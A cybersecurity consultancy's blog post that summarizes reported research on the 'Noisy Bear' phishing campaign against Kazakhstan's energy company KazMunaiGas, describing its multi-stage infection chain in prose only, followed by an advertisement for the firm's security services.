Screenshot 2025-03-15 170925-modified
CyberTech Nexus
get a quote
Noisy Bear Campaign Targets Kazakhstan’s Energy Sector with Sophisticated Phishing Attack
September 8, 2025
Uncategorized

A newly identified advanced persistent threat group, dubbed Noisy Bear, has launched a wave of cyberattacks against Kazakhstan’s energy sector, with a particular focus on KazMunaiGas (KMG), the nation’s leading oil and gas company. Researchers at Seqrite Labs have been tracking the group’s activity since April 2025 and attribute the campaign to actors possibly of Russian origin.

The campaign, known as Operation BarrelFire, leverages spear-phishing tactics to infiltrate corporate networks. In May 2025, attackers used a compromised business email belonging to a finance department employee at KMG to deliver malicious files disguised as urgent internal HR communications. The phishing email, marked “URGENT! Review the updated salary schedule,” contained a ZIP attachment named График.zip (Schedule.zip). Inside were three files:

  • A decoy document bearing KMG’s official logo, written in Russian and Kazakh, instructing employees to run a program named KazMunayGaz_Viewer
  • A README.txt repeating the same instructions
  • A malicious LNK shortcut file named График зарплат.lnk (Salary Schedule.lnk)

When executed, the shortcut triggered a sophisticated infection chain:

  • Stage 0 – LNK and Batch Scripts
    The malicious LNK file downloaded batch scripts (123.bat and it.bat) from a remote server. These scripts executed further payloads while masking malicious activity under normal processes.
  • Stage 1 – PowerShell Loaders (DOWNSHELL)
    The scripts fetched PowerShell-based loaders dubbed DOWNSHELL, which disabled antivirus scanning by tampering with AMSI (Antimalware Scan Interface). They then loaded malicious shellcode into legitimate processes.
  • Stage 2 – DLL Implant
    Finally, the attackers deployed a 64-bit DLL implant, capable of spawning reverse shells via thread hijacking techniques. This allowed Noisy Bear to maintain persistent access and exfiltrate sensitive corporate data.

The campaign’s infrastructure was traced to domains and servers hosted under Aeza Group LLC, a sanctioned Russian hosting provider. The use of Russian-language comments in the malware, operational overlaps with previous campaigns, and reliance on open-source penetration testing tools such as Metasploit and PowerSploit further support attribution to a Russian threat actor.

How Our Cybersecurity Services Could Help

Such targeted campaigns highlight the increasing sophistication of cyber adversaries. Our consultancy provides a comprehensive defense strategy across the full cyber kill chain:

  • IT & Cybersecurity Consultancy – Tailored strategies to strengthen enterprise resilience against spear-phishing and advanced persistent threats.
  • Password Security and Personal Data Security – Protection against account compromise, ensuring employee credentials are hardened against brute force and phishing attacks.
  • Social Media Security – Monitoring for impersonation and fraudulent accounts that can be exploited for reconnaissance or social engineering.
  • Incident Response & Recovery – Rapid containment, eradication, and system recovery following intrusions such as Noisy Bear’s DLL implant infections.
  • Security Audits & Vulnerability Assessments – Identifying misconfigurations and weaknesses before adversaries exploit them.
  • Penetration Testing – Simulating real-world APT attacks to evaluate defenses against threats like phishing chains and DLL injection.
  • Compliance & Regulatory Services – Assisting firms in energy and critical infrastructure to meet national and international cybersecurity standards.
  • Managed Security Services (MSS) – Continuous monitoring of logs, endpoints, and network traffic to detect anomalies before they escalate.
  • Cyber Protection Academy – Training employees to recognize and report phishing attempts, the very vector exploited by Noisy Bear.
  • Cybersecurity Recruitment Services – Building skilled security teams equipped to defend high-value sectors such as oil and gas.

The Noisy Bear operation demonstrates how modern threat actors exploit trust within organizations, using legitimate-looking communications to trigger multi-stage malware delivery. For companies operating in critical industries like energy, the stakes are higher than ever. Proactive defense, employee training, and continuous monitoring are no longer optional, they are essential.

References

  • Seqrite Labs (2025). Noisy Bear APT campaign targeting Kazakhstan’s energy sector.
  • The Hacker News (2025). Russian-linked Noisy Bear targets KazMunaiGas employees with phishing campaign.
  • MITRE ATT&CK Framework – Techniques T1204, T1059, T1562, T1105.
🔖Tags: Compliance Cybersecurity Awareness SMEs
Facebook
Twitter

Leave a Reply

Your email address will not be published. Required fields are marked *